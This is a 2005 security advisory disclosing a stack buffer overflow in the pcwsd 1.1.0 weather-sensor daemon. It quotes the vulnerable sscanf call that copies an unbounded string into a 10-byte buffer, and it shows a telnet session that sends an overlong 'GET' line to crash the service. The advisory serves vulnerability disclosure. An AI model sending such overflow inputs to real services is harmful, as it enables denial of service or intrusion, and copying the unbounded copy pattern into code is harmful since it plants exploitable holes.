Tripbit Security Advisory
TA-030305 


Severity: 
High
Application: 
 pcwsd 1.1.0
Platform: 
 Windows
Class: 
 Insufficient Boundary Checking
Release Date: 
 March 03rd, 2005
Vendor: 
http://home.geggus.net/pcwsd/


Overview
pcwsd (PC weather sensor daemon) is a TCP daemon and data logging software for receiving data from the environmental radio sensors sold by German electronic supplier ELV.

• Details
pcwsd-1.1.0/pcwsd.c

[...]
63: #define MAXLINE 4096
[...]

[...]
771: char line[MAXLINE];
[...]

[...]
930: if (strncmp(line,"get",3)==0) {
931:   getCmd(sockfd,line);
932:   continue;
933: }
[...]

[...]
720: void getCmd(int fd, char* cmdline) {
721:   int saddr,fault,i;
722:   char sname[10];
723:   int args;
724:   char buf[70];
725:   char chr;
726:
731:   args=sscanf(cmdline, "get %s %1d%c", sname, &saddr, &chr);
732:   if ((args == 3) && (chr=='\r')) {
733:
734:   /* check for valid sensor address */
735:   if ((saddr >=0) && (saddr <8)) {
736:
737:     /* write requested value */
738:     for (i=0; i<NUMDATA;i++) {
739:       if (strcmp(sname,commands[i]) == 0) {
740:         runSubCommand(fd,i,saddr);
741:         break;
742:       }
742:     }
[...]

Example:

$ telnet 127.0.0.1 4711
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
PCWSD Version 1.1.0 ready
GET /AAAAAAAAAA...

Connection closed by foreign host.
$

• Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an 'AS IS' condition. There are 'NO' warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

• Additional information
This vulnerability has been found and researched by:

posidron posidron@tripbit.org
rushjo rushjo@tripbit.org

• Availability
You can find the latest version of this warning under the following URL:

http://www.tripbit.org/advisories/TA-030305.html